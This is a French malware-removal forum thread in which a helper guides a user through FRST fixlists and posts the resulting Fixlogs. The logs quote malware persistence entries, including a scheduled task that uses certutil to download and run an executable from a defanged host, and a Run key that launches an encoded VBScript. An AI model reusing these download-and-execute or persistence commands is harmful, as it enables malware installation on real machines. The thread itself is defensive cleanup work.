A voir également:
- SysinfY2X et trojans
- Trojan Barys et autres virus - Forum Virus
- Infesté de trojan et autres virus, HELP!! ✓ - Forum Virus
- Activité réseau anormale: trojan et autres... ✓ - Forum Virus
- Au secours ! Win32 : trojan et patched-BA ✓ - Forum Virus
- Infecté par Win32 et trojan INI : Shortchut ✓ - Forum Virus
4 réponses
Salut,
Tu as des programmes qui ont été installés à l'achat de l'ordinateur ou installés par la suite et qui sont pas forcément utiles.
Ils encombrent Windows et peuvent le ralentir.
Tu peux donc les désinstaller.
Vas dans le Panneau de configuration
puis programmes et fonctionnalités.
Désinstalle :
CCleaner
Java
McAfee WebAdvisor
PS : CCleaner n'est pas vraiment utile, même si on le recommande de partout.
Si tu tiens à le garder, désactive la surveillance de CCleaner, ça se met au démarrage de Windows et le ralentit avec ces nettoyages incessants, voir : https://www.malekal.com/supprimer-ccleaner-demarrage-windows/
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Relance FRST puis sur ton clavier appuyer sur la touche CTRL + Y.
Le bloc-note va s'ouvrir, copie/colle ceci.
Enregistre le contenu par le menu fichier puis enregistrer.
Ferme le bloc-note, retourne sur FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire et automatique.
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
3°)
Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite
4°)
Pour nettoyer les disques amovibles des virus USB, suivre dans l'ordre les étapes du tutoriel : insère un à un tes clefs USB et disques durs externes que tu as pour les nettoyer. Envoie ensuite les rapports sur https://pjjoint.malekal.com/ et donne les liens menant à ces rapports pour que l'on puisse les consulter.
Brancher toutes les clefs USB et autres périphériques amovibles.
[color=red]ATTENTION: NE PAS INDIQUER LE LECTEUR DE TON DISQUE DUR ![/color]
Ouvre ce rapport avec le bloc-notes et copie/colle le contenu ici dans une prochaine réponse.
5°)
Vois ce que cela donne et si des améliorations ont eu lieu.
Si ce n'est pas le cas, si tu as encore des pages de pubs intempestives, précise sur quel navigateur WEB.
Refais un scan FRST et donne les nouveaux rapports via pjjoint.
Tu as des programmes qui ont été installés à l'achat de l'ordinateur ou installés par la suite et qui sont pas forcément utiles.
Ils encombrent Windows et peuvent le ralentir.
Tu peux donc les désinstaller.
Vas dans le Panneau de configuration
puis programmes et fonctionnalités.
Désinstalle :
CCleaner
Java
McAfee WebAdvisor
PS : CCleaner n'est pas vraiment utile, même si on le recommande de partout.
Si tu tiens à le garder, désactive la surveillance de CCleaner, ça se met au démarrage de Windows et le ralentit avec ces nettoyages incessants, voir : https://www.malekal.com/supprimer-ccleaner-demarrage-windows/
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Relance FRST puis sur ton clavier appuyer sur la touche CTRL + Y.
Le bloc-note va s'ouvrir, copie/colle ceci.
Start:
CloseProcesses:
CreateRestorePoint:
HKU\S-1-5-21-2431860244-1468966284-1414806171-1011\...\Run: [SysinfY2X] => C:\WINDOWS\system32\cmd.exe /c start wscript /e:VBScript.Encode %temp%\SysinfY2X.db <==== ATTENTION
HKU\S-1-5-21-2431860244-1468966284-1414806171-1011\...\Run: [StillPond] => "C:\Windows\rss\csrss.exe" <==== ATTENTION
HKU\S-1-5-21-2431860244-1468966284-1414806171-1011\...\Run: [CloudNet] => C:\Users\AFELLAH\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-11-20] (Accès refusé) [Fichier non signé] <==== ATTENTION
Task: {007F47C8-2433-4A39-B02E-8F8F8C824C66} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://tfortytimes.com/app/app.exe C:\Users\AFELLAH\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\AFELLAH\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: {793C92AC-7F63-48FC-BBCE-1317ABC9CE1B} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe <==== ATTENTION
Task: {56DD15B7-F473-460D-BCCE-B26A1249B0B5} - System32\Tasks\update-sys => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe
EmptyTemp:
RemoveProxy:
Hosts:
Reboot:
End:
Enregistre le contenu par le menu fichier puis enregistrer.
Ferme le bloc-note, retourne sur FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire et automatique.
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
- Réparer Mozilla Firefox (premier paragraphe)
- Réparer Google Chrome (seulement le premier paragraphe).
- Réinitialiser et réparer Internet Explorer
3°)
Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite
4°)
Pour nettoyer les disques amovibles des virus USB, suivre dans l'ordre les étapes du tutoriel : insère un à un tes clefs USB et disques durs externes que tu as pour les nettoyer. Envoie ensuite les rapports sur https://pjjoint.malekal.com/ et donne les liens menant à ces rapports pour que l'on puisse les consulter.
Brancher toutes les clefs USB et autres périphériques amovibles.
- Télécharger Remediate VBS Worm
- Lancer l'option B
- Taper la lettre de la clef USB, par exemple, E et entrée
[color=red]ATTENTION: NE PAS INDIQUER LE LECTEUR DE TON DISQUE DUR ![/color]
- Va dans "Mon ordinateur" puis disque "C", un rapport "Rem-VBS.log" doit s'y trouver.
Ouvre ce rapport avec le bloc-notes et copie/colle le contenu ici dans une prochaine réponse.
5°)
Vois ce que cela donne et si des améliorations ont eu lieu.
Si ce n'est pas le cas, si tu as encore des pages de pubs intempestives, précise sur quel navigateur WEB.
Refais un scan FRST et donne les nouveaux rapports via pjjoint.
Bonjour afellah,
Quel est le problème ? Il faut que tu sois plus précis.
C'est bien d'avoir envoyer les liens mais il faut expliquer le problème.
Cordialement,
Quel est le problème ? Il faut que tu sois plus précis.
C'est bien d'avoir envoyer les liens mais il faut expliquer le problème.
Cordialement,
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Relance FRST puis sur ton clavier appuyer sur la touche CTRL + Y.
Le bloc-note va s'ouvrir, copie/colle ceci.
Enregistre le contenu par le menu fichier puis enregistrer.
Ferme le bloc-note, retourne sur FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire et automatique.
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
Relance FRST puis sur ton clavier appuyer sur la touche CTRL + Y.
Le bloc-note va s'ouvrir, copie/colle ceci.
Start:
CloseProcesses:
CreateRestorePoint:
HKU\S-1-5-21-2431860244-1468966284-1414806171-1011\...\Run: [StillPond] => C:\Windows\rss\csrss.exe [4018176 2019-11-20] () [Fichier non signé] <==== ATTENTION
Task: {5802B300-2C68-4711-A755-294A4CFBEE95} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [4018176 2019-11-20] () [Fichier non signé] <==== ATTENTION
C:\Windows\rss\csrss.exe
Task: {BBA20E39-78F4-4F8C-B346-942D10EE9FCE} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://tfortytimes.com/app/app.exe C:\Users\AFELLAH\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\AFELLAH\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
EmptyTemp:
RemoveProxy:
Hosts:
Reboot:
End:
Enregistre le contenu par le menu fichier puis enregistrer.
Ferme le bloc-note, retourne sur FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire et automatique.
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 21-11-2019
Exécuté par AFELLAH (22-11-2019 14:58:33) Run:2
Exécuté depuis C:\Users\AFELLAH\Desktop
Profils chargés: AFELLAH (Profils disponibles: Admin & AFELLAH & Adminweb)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
Start:
CloseProcesses:
CreateRestorePoint:
HKU\S-1-5-21-2431860244-1468966284-1414806171-1011\...\Run: [StillPond] => C:\Windows\rss\csrss.exe [4018176 2019-11-20] () [Fichier non signé] <==== ATTENTION
Task: {5802B300-2C68-4711-A755-294A4CFBEE95} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [4018176 2019-11-20] () [Fichier non signé] <==== ATTENTION
C:\Windows\rss\csrss.exe
Task: {BBA20E39-78F4-4F8C-B346-942D10EE9FCE} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://tfortytimes.com/app/app.exe C:\Users\AFELLAH\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\AFELLAH\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
EmptyTemp:
RemoveProxy:
Hosts:
Reboot:
End:
Processus fermé avec succès.
Le Point de restauration a été créé avec succès.
"HKU\S-1-5-21-2431860244-1468966284-1414806171-1011\Software\Microsoft\Windows\CurrentVersion\Run\\StillPond" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{5802B300-2C68-4711-A755-294A4CFBEE95}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5802B300-2C68-4711-A755-294A4CFBEE95}" => supprimé(es) avec succès
C:\Windows\System32\Tasks\csrss => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\csrss" => supprimé(es) avec succès
C:\Windows\rss\csrss.exe => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{BBA20E39-78F4-4F8C-B346-942D10EE9FCE}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BBA20E39-78F4-4F8C-B346-942D10EE9FCE}" => supprimé(es) avec succès
C:\Windows\System32\Tasks\ScheduledUpdate => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ScheduledUpdate" => supprimé(es) avec succès
========= RemoveProxy: =========
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => supprimé(es) avec succès
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => supprimé(es) avec succès
"HKU\S-1-5-21-2431860244-1468966284-1414806171-1011\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => supprimé(es) avec succès
"HKU\S-1-5-21-2431860244-1468966284-1414806171-1011\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => supprimé(es) avec succès
========= Fin de RemoveProxy: =========
C:\Windows\System32\Drivers\etc\hosts => déplacé(es) avec succès
Hosts restauré(es) avec succès.
=========== EmptyTemp: ==========
BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 15109986 B
Java, Flash, Steam htmlcache => 0 B
Windows/system/drivers => 578191520 B
Edge => 0 B
Chrome => 135641223 B
Firefox => 23643531 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 128 B
systemprofile32 => 128 B
LocalService => 128 B
NetworkService => 14948 B
Admin => 14948 B
AFELLAH => 11001027 B
Adminweb => 11001027 B
RecycleBin => 384092 B
EmptyTemp: => 747.1 MB données temporaires supprimées.
================================
Le système a dû redémarrer.
Exécuté par AFELLAH (22-11-2019 14:58:33) Run:2
Exécuté depuis C:\Users\AFELLAH\Desktop
Profils chargés: AFELLAH (Profils disponibles: Admin & AFELLAH & Adminweb)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
Start:
CloseProcesses:
CreateRestorePoint:
HKU\S-1-5-21-2431860244-1468966284-1414806171-1011\...\Run: [StillPond] => C:\Windows\rss\csrss.exe [4018176 2019-11-20] () [Fichier non signé] <==== ATTENTION
Task: {5802B300-2C68-4711-A755-294A4CFBEE95} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [4018176 2019-11-20] () [Fichier non signé] <==== ATTENTION
C:\Windows\rss\csrss.exe
Task: {BBA20E39-78F4-4F8C-B346-942D10EE9FCE} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://tfortytimes.com/app/app.exe C:\Users\AFELLAH\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\AFELLAH\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
EmptyTemp:
RemoveProxy:
Hosts:
Reboot:
End:
Processus fermé avec succès.
Le Point de restauration a été créé avec succès.
"HKU\S-1-5-21-2431860244-1468966284-1414806171-1011\Software\Microsoft\Windows\CurrentVersion\Run\\StillPond" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{5802B300-2C68-4711-A755-294A4CFBEE95}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5802B300-2C68-4711-A755-294A4CFBEE95}" => supprimé(es) avec succès
C:\Windows\System32\Tasks\csrss => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\csrss" => supprimé(es) avec succès
C:\Windows\rss\csrss.exe => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{BBA20E39-78F4-4F8C-B346-942D10EE9FCE}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BBA20E39-78F4-4F8C-B346-942D10EE9FCE}" => supprimé(es) avec succès
C:\Windows\System32\Tasks\ScheduledUpdate => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ScheduledUpdate" => supprimé(es) avec succès
========= RemoveProxy: =========
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => supprimé(es) avec succès
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => supprimé(es) avec succès
"HKU\S-1-5-21-2431860244-1468966284-1414806171-1011\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => supprimé(es) avec succès
"HKU\S-1-5-21-2431860244-1468966284-1414806171-1011\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => supprimé(es) avec succès
========= Fin de RemoveProxy: =========
C:\Windows\System32\Drivers\etc\hosts => déplacé(es) avec succès
Hosts restauré(es) avec succès.
=========== EmptyTemp: ==========
BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 15109986 B
Java, Flash, Steam htmlcache => 0 B
Windows/system/drivers => 578191520 B
Edge => 0 B
Chrome => 135641223 B
Firefox => 23643531 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 128 B
systemprofile32 => 128 B
LocalService => 128 B
NetworkService => 14948 B
Admin => 14948 B
AFELLAH => 11001027 B
Adminweb => 11001027 B
RecycleBin => 384092 B
EmptyTemp: => 747.1 MB données temporaires supprimées.
================================
Le système a dû redémarrer.
Fin de Fixlog 15:00:21
Fais un scan en ligne avec NOD32 puis enregistre le rapport. Envoie le sur https://pjjoint.malekal.com/ et donne le lien ici.
un grand merci .
Voila le résultat de mon fix :
Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 19-11-2019
Exécuté par AFELLAH (20-11-2019 16:30:21) Run:1
Exécuté depuis C:\Users\AFELLAH\Desktop
Profils chargés: AFELLAH (Profils disponibles: Admin & AFELLAH & Adminweb)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
Start:
CloseProcesses:
CreateRestorePoint:
HKU\S-1-5-21-2431860244-1468966284-1414806171-1011\...\Run: [SysinfY2X] => C:\WINDOWS\system32\cmd.exe /c start wscript /e:VBScript.Encode %temp%\SysinfY2X.db <==== ATTENTION
HKU\S-1-5-21-2431860244-1468966284-1414806171-1011\...\Run: [StillPond] => "C:\Windows\rss\csrss.exe" <==== ATTENTION
HKU\S-1-5-21-2431860244-1468966284-1414806171-1011\...\Run: [CloudNet] => C:\Users\AFELLAH\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-11-20] (Acc�s refus�) [Fichier non sign�] <==== ATTENTION
Task: {007F47C8-2433-4A39-B02E-8F8F8C824C66} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://tfortytimes.com/app/app.exe C:\Users\AFELLAH\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\AFELLAH\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: {793C92AC-7F63-48FC-BBCE-1317ABC9CE1B} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe <==== ATTENTION
Task: {56DD15B7-F473-460D-BCCE-B26A1249B0B5} - System32\Tasks\update-sys => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe
EmptyTemp:
RemoveProxy:
Hosts:
Reboot:
End:
Processus fermé avec succès.
Le Point de restauration a été créé avec succès.
"HKU\S-1-5-21-2431860244-1468966284-1414806171-1011\Software\Microsoft\Windows\CurrentVersion\Run\\SysinfY2X" => supprimé(es) avec succès
"HKU\S-1-5-21-2431860244-1468966284-1414806171-1011\Software\Microsoft\Windows\CurrentVersion\Run\\StillPond" => supprimé(es) avec succès
"HKU\S-1-5-21-2431860244-1468966284-1414806171-1011\Software\Microsoft\Windows\CurrentVersion\Run\\CloudNet" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{007F47C8-2433-4A39-B02E-8F8F8C824C66}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{007F47C8-2433-4A39-B02E-8F8F8C824C66}" => supprimé(es) avec succès
C:\Windows\System32\Tasks\ScheduledUpdate => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ScheduledUpdate" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{793C92AC-7F63-48FC-BBCE-1317ABC9CE1B}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{793C92AC-7F63-48FC-BBCE-1317ABC9CE1B}" => supprimé(es) avec succès
C:\Windows\System32\Tasks\csrss => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\csrss" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{56DD15B7-F473-460D-BCCE-B26A1249B0B5}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{56DD15B7-F473-460D-BCCE-B26A1249B0B5}" => supprimé(es) avec succès
C:\Windows\System32\Tasks\update-sys => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\update-sys" => supprimé(es) avec succès
========= RemoveProxy: =========
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => supprimé(es) avec succès
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => supprimé(es) avec succès
"HKU\S-1-5-21-2431860244-1468966284-1414806171-1011\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => supprimé(es) avec succès
"HKU\S-1-5-21-2431860244-1468966284-1414806171-1011\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => supprimé(es) avec succès
========= Fin de RemoveProxy: =========
C:\Windows\System32\Drivers\etc\hosts => déplacé(es) avec succès
Hosts restauré(es) avec succès.
=========== EmptyTemp: ==========
BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 17297791 B
Java, Flash, Steam htmlcache => 0 B
Windows/system/drivers => 6417218 B
Edge => 0 B
Chrome => 220613974 B
Firefox => 193026512 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 66228 B
Public => 66228 B
ProgramData => 66228 B
systemprofile => 58624634 B
systemprofile32 => 59625775 B
LocalService => 59625775 B
NetworkService => 59664103 B
Admin => 59695761 B
AFELLAH => 291764392 B
Adminweb => 571119076 B
RecycleBin => 10570974197 B
EmptyTemp: => 11.3 GB données temporaires supprimées.
================================
Le système a dû redémarrer.
Fin de Fixlog 16:36:14
j'ai fais ce que tu a demandé, par contre j'ai tjrs des alertes de sécurité (capture écran ) .
voici les liens générés à nouveau :
https://pjjoint.malekal.com/files.php?id=FRST_20191121_t8s5r15i8n14
https://pjjoint.malekal.com/files.php?id=20191121_m9o10l6e7c10
https://pjjoint.malekal.com/files.php?id=20191121_w11v5q12u8k11
Donc tu n'as pas tout fait.
MBAM était à faire dans le 3)